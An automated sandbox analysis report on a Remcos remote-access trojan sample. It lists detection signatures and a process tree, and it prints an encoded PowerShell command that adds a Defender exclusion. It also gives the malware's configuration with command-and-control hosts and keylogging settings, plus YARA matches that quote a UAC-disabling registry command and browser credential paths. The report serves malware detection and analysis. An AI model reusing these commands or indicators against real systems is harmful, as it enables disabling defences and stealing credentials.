Edit tour

Windows Analysis Report
kyFBQxVbsg.exe

Overview

General Information

Sample Name:	kyFBQxVbsg.exe
Analysis ID:	652393
MD5:	972334f0c55d0aeab0b32efe41ea3470
SHA1:	e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256:	eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
Tags:	exeRATRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Contains functionality to steal Firefox passwords or cookies

Yara detected Costura Assembly Loader

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Installs a global keyboard hook

Delayed program exit found

Contains functionality to steal Chrome passwords or cookies

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to simulate mouse events

Classification

Process Tree

System is w10x64

kyFBQxVbsg.exe (PID: 6232 cmdline: "C:\Users\user\Desktop\kyFBQxVbsg.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)

powershell.exe (PID: 6288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

InstallUtil.exe (PID: 2328 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

InstallUtil.exe (PID: 6528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

Qerdo.exe (PID: 6216 cmdline: "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)

InstallUtil.exe (PID: 2592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

InstallUtil.exe (PID: 5836 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

Qerdo.exe (PID: 5652 cmdline: "C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe" MD5: 972334F0C55D0AEAB0B32EFE41EA3470)

InstallUtil.exe (PID: 4900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

InstallUtil.exe (PID: 6304 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)

cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000000.00000003.526374372.0000000003850000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
